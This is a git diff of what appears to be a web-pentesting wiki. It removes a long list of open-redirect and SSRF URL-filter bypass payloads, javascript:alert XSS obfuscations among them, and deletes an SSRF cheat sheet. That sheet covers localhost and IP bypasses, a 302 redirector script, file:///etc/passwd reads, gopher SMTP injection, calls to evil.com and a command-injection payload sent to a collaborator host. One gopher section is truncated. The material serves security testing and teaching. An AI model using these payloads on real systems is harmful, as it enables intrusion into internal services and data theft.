-http:3H6k7lIAiqjfNeN@0xd83ad6ce
-http://3H6k7lIAiqjfNeN@[::216.58.214.206]
-http:3H6k7lIAiqjfNeN@[::216.58.214.206]
-http://3H6k7lIAiqjfNeN@3627734734
-http:3H6k7lIAiqjfNeN@3627734734
-http://3H6k7lIAiqjfNeN@472.314.470.462
-http:3H6k7lIAiqjfNeN@472.314.470.462
-http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
-http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
-http://3H6k7lIAiqjfNeN@whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
-http://3H6k7lIAiqjfNeN@whitelisted.com+@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
-http://3H6k7lIAiqjfNeN@whitelisted.com@google.com/
-http://3H6k7lIAiqjfNeN@whitelisted.com+@google.com/
-http://472.314.470.462
-http:472.314.470.462
-http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%5c%5c.whitelisted.com/
-/http://%67%6f%6f%67%6c%65%2e%63%6f%6d
-http://%67%6f%6f%67%6c%65%2e%63%6f%6d
-http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ:80?@whitelisted.com/
-http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ:80#@whitelisted.com/
-http://[::ffff:216.58.214.206]
-http:[::ffff:216.58.214.206]
-/http://google.com
-/http:/google.com
-http://;@google.com
-http://.google.com
-http://google.com
-http:/\/\google.com
-http:/google.com
-http:google.com
-http://google.com%23.whitelisted.com/
-http://google.com%2f%2f.whitelisted.com/
-http://google.com%3F.whitelisted.com/
-http://google.com%5c%5c.whitelisted.com/
-http://google.com:80?@whitelisted.com/
-http://google.com:80#@whitelisted.com/
-http://google.com\twhitelisted.com/
-//https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
-/https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
-https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
-https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
-https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-https:Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-https://%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-/https://%09/google.com
-https://%09/google.com
-https://%09/whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-https://%09/whitelisted.com@google.com
-https://%0a%0dⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-https://%0a%0dgoogle.com
-//https:///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
-/https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
-https:///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
-//https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
-https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
-/https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
-https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
-/https:///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
-/https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
-https:///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
-https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
-https%3a%2f%2fgoogle.com%2f
-/https://%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-/https:/%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
-https://%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-https:/%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
-/https://%5cgoogle.com
-/https:/%5cgoogle.com/
-https://%5cgoogle.com
-https:/%5cgoogle.com/
-/https://%5cwhitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-https://%5cwhitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-/https://%5cwhitelisted.com@google.com
-https://%5cwhitelisted.com@google.com
-https://%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
-//https://google.com//
-/https://google.com//
-/https://google.com/
-/https://google.com
-/https:google.com
-https://////google.com
-https://google.com//
-https://google.com/
-https://google.com
-https:/\google.com
-https:google.com
-//https:///google.com/%2e%2e
-/https://google.com/%2e%2e
-https:///google.com/%2e%2e
-//https://google.com/%2e%2e%2f
-https://google.com/%2e%2e%2f
-/https://google.com/%2f..
-https://google.com/%2f..
-/https:///google.com/%2f%2e%2e
-/https://google.com/%2f%2e%2e
-https:///google.com/%2f%2e%2e
-https://google.com/%2f%2e%2e
-https://:@google.com\@whitelisted.com
-https://google.com?whitelisted.com
-https://google.com/whitelisted.com
-https://google.com\whitelisted.com
-https://google.com#whitelisted.com
-https://google%E3%80%82com
-//https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
-/https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
-https://:@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\@whitelisted.com
-https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/whitelisted.com
-https://whitelisted.com;@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
-https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
-https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-/https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
-https:///whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
-//https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
-https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
-/https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
-https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
-/https:///whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
-/https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
-https:///whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
-https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
-//https://whitelisted.com@google.com//
-/https://whitelisted.com@google.com/
-https://whitelisted.com;@google.com
-https://whitelisted.com.google.com
-https://whitelisted.com@google.com//
-https://whitelisted.com@google.com/
-https://whitelisted.com@google.com
-/https://whitelisted.com@google.com/%2e%2e
-https:///whitelisted.com@google.com/%2e%2e
-//https://whitelisted.com@google.com/%2e%2e%2f
-https://whitelisted.com@google.com/%2e%2e%2f
-/https://whitelisted.com@google.com/%2f..
-https://whitelisted.com@google.com/%2f..
-/https:///whitelisted.com@google.com/%2f%2e%2e
-/https://whitelisted.com@google.com/%2f%2e%2e
-https:///whitelisted.com@google.com/%2f%2e%2e
-https://whitelisted.com@google.com/%2f%2e%2e
-/https://whitelisted.com@google.com/%2f.//whitelisted.com@google.com/%2f..
-https://whitelisted.com/https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
-https://whitelisted.com/https://google.com/
-@https://www.google.com
-http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\twhitelisted.com/
-http://whitelisted.com@00330.00072.0000326.00000316
-http:whitelisted.com@00330.00072.0000326.00000316
-http://whitelisted.com@00330.0x3a.54990
-http:whitelisted.com@00330.0x3a.54990
-http://whitelisted.com@00330.3856078
-http:whitelisted.com@00330.3856078
-http://whitelisted.com@0330.072.0326.0316
-http:whitelisted.com@0330.072.0326.0316
-http://whitelisted.com@0xd8.072.54990
-http:whitelisted.com@0xd8.072.54990
-http://whitelisted.com@0xd8.0x3a.0xd6.0xce
-http:whitelisted.com@0xd8.0x3a.0xd6.0xce
-http://whitelisted.com@0xd8.3856078
-http:whitelisted.com@0xd8.3856078
-http://whitelisted.com@0xd83ad6ce
-http:whitelisted.com@0xd83ad6ce
-http://whitelisted.com@[::216.58.214.206]
-http:whitelisted.com@[::216.58.214.206]
-http://whitelisted.com%2eⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
-http://whitelisted.com%2egoogle.com/
-http://whitelisted.com@3627734734
-http:whitelisted.com@3627734734
-http://whitelisted.com@472.314.470.462
-http:whitelisted.com@472.314.470.462
-http://whitelisted.com:80%40Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
-http://whitelisted.com:80%40google.com/
-http://whitelisted.com@[::ffff:216.58.214.206]
-http:whitelisted.com@[::ffff:216.58.214.206]
-http://whitelisted.com@google.com/
-http://whitelisted.com+&@google.com#+@whitelisted.com/
-http://whitelisted.com+&@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ#+@whitelisted.com/
-http://www.google.com\.whitelisted.com
-http://www.Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\.whitelisted.com
-http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
-http:XY>.7d8T\205pZM@00330.00072.0000326.00000316
-http://XY>.7d8T\205pZM@00330.0x3a.54990
-http:XY>.7d8T\205pZM@00330.0x3a.54990
-http://XY>.7d8T\205pZM@00330.3856078
-http:XY>.7d8T\205pZM@00330.3856078
-http://XY>.7d8T\205pZM@0330.072.0326.0316
-http:XY>.7d8T\205pZM@0330.072.0326.0316
-http://XY>.7d8T\205pZM@0xd8.072.54990
-http:XY>.7d8T\205pZM@0xd8.072.54990
-http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
-http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
-http://XY>.7d8T\205pZM@0xd8.3856078
-http:XY>.7d8T\205pZM@0xd8.3856078
-http://XY>.7d8T\205pZM@0xd83ad6ce
-http:XY>.7d8T\205pZM@0xd83ad6ce
-http://XY>.7d8T\205pZM@[::216.58.214.206]
-http:XY>.7d8T\205pZM@[::216.58.214.206]
-http://XY>.7d8T\205pZM@3627734734
-http:XY>.7d8T\205pZM@3627734734
-http://XY>.7d8T\205pZM@472.314.470.462
-http:XY>.7d8T\205pZM@472.314.470.462
-http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
-http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
-http://XY>.7d8T\205pZM@whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
-http://XY>.7d8T\205pZM@whitelisted.com+@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
-http://XY>.7d8T\205pZM@whitelisted.com@google.com/
-http://XY>.7d8T\205pZM@whitelisted.com+@google.com/
-ja\nva\tscript\r:alert(1)
-java%09script:alert(1)
-java%0ascript:alert(1)
-java%0d%0ascript%0d%0a:alert(0)
-java%0dscript:alert(1)
-Javas%26%2399;ript:alert(1)
-//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\twhitelisted.com/
-\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
-////whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
-////whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
-///whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
-///whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
-//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/whitelisted.com
-//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\@whitelisted.com
-//whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
-//whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
-Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/whitelisted.com
-whitelisted.com;@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-////whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
-///whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
-////whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
-///whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
-//whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
-////whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
-///whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
-//whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
-////whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
-///whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
-//whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
-/\whitelisted.com:80%40google.com
-whitelisted.com@%E2%80%AE@google.com
-////whitelisted.com@google.com//
-////whitelisted.com@google.com/
-///whitelisted.com@google.com//
-///whitelisted.com@google.com/
-//whitelisted.com@google.com//
-//whitelisted.com@google.com/
-whitelisted.com;@google.com
-whitelisted.com.google.com
-////whitelisted.com@google.com/%2e%2e
-///whitelisted.com@google.com/%2e%2e
-////whitelisted.com@google.com/%2e%2e%2f
-///whitelisted.com@google.com/%2e%2e%2f
-//whitelisted.com@google.com/%2e%2e%2f
-////whitelisted.com@google.com/%2f..
-///whitelisted.com@google.com/%2f..
-//whitelisted.com@google.com/%2f..
-////whitelisted.com@google.com/%2f%2e%2e
-///whitelisted.com@google.com/%2f%2e%2e
-//whitelisted.com@google.com/%2f%2e%2e
-//whitelisted.com+&@google.com#+@whitelisted.com/
-//whitelisted.com@https:///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
-//whitelisted.com@https:///google.com/%2e%2e
-//whitelisted.com+&@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ#+@whitelisted.com/
-\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
-//XY>.7d8T\205pZM@whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
-//XY>.7d8T\205pZM@whitelisted.com+@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
-//XY>.7d8T\205pZM@whitelisted.com@google.com/
-//XY>.7d8T\205pZM@whitelisted.com+@google.com/
```
## Open Redirect uploading svg files
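Review bot: along with the host-format list, this hunk drops a set of `javascript:`-obfuscation payloads that belong to the `### Open Redirect to XSS` block they sit in (`ja\nva\tscript\r:alert(1)`, `java%09script:alert(1)`, `java%0ascript:alert(1)`, `Javas%26%2399;ript:alert(1)`, the `\u006A…` and `\x6A…` encoded forms, and the `data:text/html;base64,…` lines), none of which is a URL-format bypass. Keep those lines in this block next to the surviving `";alert(0);//` entry rather than relying on the SSRF sub-page. Fence handling is consistent: the closing fence and the re-opening fence are both removed, so the surviving lines form one block closed by the kept fence.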
diff --git a/pentesting-web/pocs-and-polygloths-cheatsheet/README.md b/pentesting-web/pocs-and-polygloths-cheatsheet/README.md
index 4cff3481d..f7d17eaa0 100644
--- a/pentesting-web/pocs-and-polygloths-cheatsheet/README.md
+++ b/pentesting-web/pocs-and-polygloths-cheatsheet/README.md
@@ -125,7 +125,7 @@ http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
```
-## [Open Redirect](../open-redirect.md) / [Server Side Request Forgery](../ssrf-server-side-request-forgery.md)
+## [Open Redirect](../open-redirect.md) / [Server Side Request Forgery](../ssrf-server-side-request-forgery/)
### Basic Tests
@@ -164,7 +164,7 @@ x=>alert(/C
x=>alert(/Chrome%20XSS%20filter%20bypass/);>
```
-## [Server Side Request Forgery](../ssrf-server-side-request-forgery.md)
+## [Server Side Request Forgery](../ssrf-server-side-request-forgery/)
The same tests used for Open Redirect can be used here.
diff --git a/pentesting-web/ssrf-server-side-request-forgery.md b/pentesting-web/ssrf-server-side-request-forgery.md
deleted file mode 100644
index e26a67c37..000000000
--- a/pentesting-web/ssrf-server-side-request-forgery.md
+++ /dev/null
@@ -1,1289 +0,0 @@
-# SSRF (Server Side Request Forgery)
-
-## What is Server Side Request Forgery?
-
-Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to **induce the server-side application to make HTTP requests to an arbitrary domain** of the attacker's choosing. (From [here](https://portswigger.net/web-security/ssrf))
-
-## What you should try to do
-
-* Accessing to **local files** (file://)
-* Trying to access to **local IP**
- * Local **IP bypass**
- * **DNS spoofing** (domains pointing to 127.0.0.1)
- * **DNS Rebinding** (resolves to an IP and next time to a local IP: [http://rbnd.gl0.eu/dnsbin](http://rbnd.gl0.eu/dnsbin)). This is useful to bypass configurations which resolves the given domain and check it against a white-list and then try to access it again (as it has to resolve the domain again a different IP can be served by the DNS). More [info here](https://geleta.eu/2019/my-first-ssrf-using-dns-rebinfing/).
-* Trying to make an **internal assets discovery and internal port scan**.
-* Accessing **private content** (filtered by IP or only accessible locally, like _/admin_ path).
-
-## Internet Exfiltration Services
-
-You could use **burpcollab** or [**pingb**](http://pingb.in) for example.
-
-## Bypass restrictions
-
-{% embed url="https://tools.intigriti.io/redirector/" %}
-
-### Basic bypass localhost
-
-```bash
-## Localhost
-http://127.0.0.1:80
-http://127.0.0.1:443
-http://127.0.0.1:22
-http://127.1:80
-http://0
-http://0.0.0.0:80
-http://localhost:80
-http://[::]:80/
-http://[::]:25/ SMTP
-http://[::]:3128/ Squid
-http://[0000::1]:80/
-http://[0:0:0:0:0:ffff:127.0.0.1]/thefile
-http://①②⑦.⓪.⓪.⓪
-
-## CDIR bypass
-http://127.127.127.127
-http://127.0.1.3
-http://127.0.0.0
-
-## Decimal bypass
-http://2130706433/ = http://127.0.0.1
-http://017700000001 = http://127.0.0.1
-http://3232235521/ = http://192.168.0.1
-http://3232235777/ = http://192.168.1.1
-
-## Hexadecimal bypass
-127.0.0.1 = 0x7f 00 00 01
-http://0x7f000001/ = http://127.0.0.1
-http://0xc0a80014/ = http://192.168.0.20
-
-##Domain FUZZ bypass (from https://github.com/0x221b/Wordlists/blob/master/Attacks/SSRF/Whitelist-bypass.txt)
-http://{domain}@127.0.0.1
-http://127.0.0.1#{domain}
-http://{domain}.127.0.0.1
-http://127.0.0.1/{domain}
-http://127.0.0.1/?d={domain}
-https://{domain}@127.0.0.1
-https://127.0.0.1#{domain}
-https://{domain}.127.0.0.1
-https://127.0.0.1/{domain}
-https://127.0.0.1/?d={domain}
-http://{domain}@localhost
-http://localhost#{domain}
-http://{domain}.localhost
-http://localhost/{domain}
-http://localhost/?d={domain}
-http://127.0.0.1%00{domain}
-http://127.0.0.1?{domain}
-http://127.0.0.1///{domain}
-https://127.0.0.1%00{domain}
-https://127.0.0.1%0A{domain}
-https://127.0.0.1?{domain}
-https://127.0.0.1///{domain}
-```
-
-### Bypass using DNS -> localhost
-
-```bash
-localtest.me = 127.0.0.1
-customer1.app.localhost.my.company.127.0.0.1.nip.io = 127.0.0.1
-mail.ebc.apple.com = 127.0.0.6 (localhost)
-127.0.0.1.nip.io = 127.0.0.1 (Resolves to the given IP)
-www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us = Resolves to www.google.com
-http://customer1.app.localhost.my.company.127.0.0.1.nip.io
-http://bugbounty.dod.network = 127.0.0.2 (localhost)
-1ynrnhl.xip.io == 169.254.169.254
-spoofed.burpcollaborator.net = 127.0.0.1
-```
-
-### Blackslash-trick
-
-In short, the _backslash-trick_ relies on exploiting a minor difference between two “URL” specifications: the [WHATWG URL Standard](https://url.spec.whatwg.org/#url-parsing), and [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#appendix-B). RFC3986 is a generic, multi-purpose specification for the syntax of _Uniform Resource Identifiers_, while the WHATWG URL Standard is specifically aimed at the Web, and at URLs (which are a subset of URIs). Modern browsers implement the WHATWG URL Standard.
-
-Both of them describe a way of parsing URI/URLs, with one slight difference. The WHATWG specification describes [one extra character](https://url.spec.whatwg.org/#authority-state), the `\`, which behaves just like `/`: ends the hostname & authority and starts the path of the URL.
-
-![The two specifications parsing the same URL differently](https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg)
-
-```
-url=https://attacker.com\@victim.com/
-url=https://attacker.com\anything@victim.com/
-```
-
-### Other Confusions
-
-![](<../.gitbook/assets/image (629).png>)
-
-image from [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/)
-
-### Other bypasses
-
-```bash
-## Malformed URLs and rare addresses
-localhost:+11211aaa
-localhost:00011211aaaa
-http://0/
-http://127.1
-http://127.0.1
-
-## Tricks
-http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
-urllib2 : 1.1.1.1
-requests + browsers : 2.2.2.2
-urllib : 3.3.3.3
-filter_var() php function: 0://evil.com:80;http://google.com:80/
-
-## Weakparser
-http://127.1.1.1:80\@127.2.2.2:80/
-http://127.1.1.1:80\@@127.2.2.2:80/
-http://127.1.1.1:80:\@@127.2.2.2:80/
-http://127.1.1.1:80#\@127.2.2.2:80/
-```
-
-### [More Domain format Bypasses](open-redirect.md#more-domain-bypasses)
-
-### Bypass domain regexp
-
-[**Go to the proposed bypasses for Referer header in CSRF**](csrf-cross-site-request-forgery.md#referer)\*\*\*\*
-
-### Bypass via redirect
-
-It might be possible that the server is **filtering the original request** of a SSRF **but not** a possible **redirect** response to that request.\
-For example, a server vulnerable to SSRF via: `url=https://www.google.com/` might be **filtering the url param**. But if you uses a [python server to respond with a 302](https://pastebin.com/raw/ywAUhFrv) to the place where you want to redirect, you might be able to **access filtered IP addresses** like 127.0.0.1 or even filtered **protocols** like gopher.\
-[Check out this report.](https://sirleeroyjenkins.medium.com/just-gopher-it-escalating-a-blind-ssrf-to-rce-for-15k-f5329a974530)
-
-```python
-#!/usr/bin/env python3
-
-#python3 ./redirector.py 8000 http://127.0.0.1/
-
-import sys
-from http.server import HTTPServer, BaseHTTPRequestHandler
-
-if len(sys.argv)-1 != 2:
- print("Usage: {} ".format(sys.argv[0]))
- sys.exit()
-
-class Redirect(BaseHTTPRequestHandler):
- def do_GET(self):
- self.send_response(302)
- self.send_header('Location', sys.argv[2])
- self.end_headers()
-
-HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()
-```
-
-### Bypass via open redirect
-
-If the server is correctly protected you could **bypass all the restrictions by exploiting an Open Redirect inside the web page**. Because the webpage will allow **SSRF to the same domain** and probably will **follow redirects**, you can exploit the **Open Redirect to make the server to access internal any resource**.\
-Read more here: [https://portswigger.net/web-security/ssrf](https://portswigger.net/web-security/ssrf)
-
-## SSRF via Referrer header
-
-Some applications employ server-side analytics software that tracks visitors. This software often logs the Referrer header in requests, since this is of particular interest for tracking incoming links. Often the analytics software will actually visit any third-party URL that appears in the Referrer header. This is typically done to analyze the contents of referring sites, including the anchor text that is used in the incoming links. As a result, the Referer header often represents fruitful attack surface for SSRF vulnerabilities.\
-To discover this kind of "hidden" vulnerabilities you could use the plugin "**Collaborator Everywhere**" from Burp.
-
-## Server browser enumeration
-
-You can use applications like [http://webhook.site](http://webhook.site) to find which browser is being used.
-
-## Exploitation
-
-### [Wget file upload](file-upload/#wget-file-upload-ssrf-trick)
-
-### file://
-
-```
-file:///etc/passwd
-```
-
-### dict://
-
-The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
-
-```
-dict://;@:/d:::
-ssrf.php?url=dict://attacker:11111/
-```
-
-### SFTP://
-
-A network protocol used for secure file transfer over secure shell
-
-```
-ssrf.php?url=sftp://evil.com:11111/
-```
-
-### TFTP://
-
-Trivial File Transfer Protocol, works over UDP
-
-```
-ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET
-```
-
-### LDAP://
-
-Lightweight Directory Access Protocol. It is an application protocol used over an IP network to manage and access the distributed directory information service.
-
-```
-ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
-```
-
-### Gopher://
-
-Using this protocol you can specify the **IP, port and bytes** you want the server to **send**. Then, you can basically exploit a SSRF to **communicate with any TCP server** (but you need to know how to talk to the service first).\
-Fortunately, you can use [Gopherus](https://github.com/tarunkant/Gopherus) to create payloads for several services. Additionally, [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) can be used to create _gopher_ payloads for _Java RMI_ services.
-
-#### Gopher smtp
-
-```
-ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
-will make a request like
-HELO localhost
-MAIL FROM:
-RCPT TO:
-DATA
-From: [Hacker]
-To:
-Date: Tue, 15 Sep 2017 17:20:26 -0400
-Subject: Ah Ah AHYou didn't say the magic word !
-.
-QUIT
-```
-
-#### Gopher HTTP
-
-```bash
-#For new lines you can use %0A, %0D%0A
-gopher://:8080/_GET / HTTP/1.0%0A%0A
-gopher://:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body
-```
-
-#### Gopher SMTP — Back connect to 1337
-
-{% code title="redirect.php" %}
-```php
-Now query it.
-https://example.com/?q=http://evil.com/redirect.php.
-```
-{% endcode %}
-
-### SMTP
-
-From [https://twitter.com/har1sec/status/1182255952055164929](https://twitter.com/har1sec/status/1182255952055164929):\
-1\. connect with SSRF on smtp localhost:25\
-2\. from the first line get the internal domain name 220[ http://blabla.internaldomain.com ](https://t.co/Ad49NBb7xy)ESMTP Sendmail\
-3\. search[ http://internaldomain.com ](https://t.co/K0mHR0SPVH)on github, find subdomains\
-4\. connect
-
-### SSRF with Command Injection
-
-It might be worth trying a payload like: `` url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami` ``
-
-### Exploiting PDFs Rendering
-
-If the web page is automatically creating a PDF with some information you have provided, you can **insert some JS that will be executed by the PDF creator** itself (the server) while creating the PDF and you will be able to abuse a SSRF. [**Find more information here**](xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)**.**
-
